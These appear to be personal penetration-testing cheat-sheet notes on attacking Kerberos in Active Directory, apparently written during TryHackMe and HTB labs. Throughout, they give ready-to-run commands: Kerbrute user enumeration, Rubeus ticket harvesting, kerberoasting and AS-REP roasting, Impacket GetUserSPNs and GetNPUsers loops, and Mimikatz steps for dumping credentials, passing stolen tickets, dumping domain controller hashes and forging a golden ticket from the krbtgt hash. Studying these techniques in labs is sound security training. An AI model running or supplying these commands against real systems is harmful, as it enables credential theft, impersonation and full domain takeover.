Kerberos

You can use Kerbrute to enumerate accounts without ever having to exploit a machine: kerbrute userenum --dc [IP] -d CONTROLLER.local /home/kali/Documents/TryHackMe/Labs/Attacking_Kerberos/User.txt -Note you will need to add an entry to your /etc/hosts file.

Rubeus (local)

https://github.com/GhostPack/Rubeus

• Rubeus.exe harvest /interval:30 - to harvest tickets
• rubeus.exe kerberoast- to get hashes of kerberoastable accounts. Use bloodhound to see if they are worth anything.
• Rubeus.exe asreproast
  • can be cracked with hashcat
  • YOU MAY NEED TO ADD 23$ TO THE HASH!! PAY ATTENTION TO THE FORMAT!!!

Impacket (remote)

Impacket-GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip [IP] -request Bash script: for user in $(cat users.txt); do impacket-GetNPUsers -no-pass -dc-ip 10.10.10.161 $domain/${user} | grep -v Impacket; done

• where $domain is just the htb of htb.local

Mimikatz

• Can be used to dump creds, but it can also be used to gain Domain Admin tickets and impersonate them. Obviously great for privesc.
• Steps:
  • mimikatz.exe
  • privilege::debug - if you run and don’t get 20, it won’t work
  • sekurlsa::tickets /export - to export tickets on machine.
    • we can impersonate the ticket. Recommend using an admin ticket…duh kerberos::ptt $ticket
  • lsadump::lsa /patch - If you are on a DC you can dump the hashes
  • lsadump::lsa /inject /name:krbtgt - can also create a golden ticket on a DC:
    • kerberos::golden /user: /domain: /sid: /krbtgt: /id:
    • you can access any machine in the domain
      • misc::cmd
      • \\MACHINE1 cmd.exe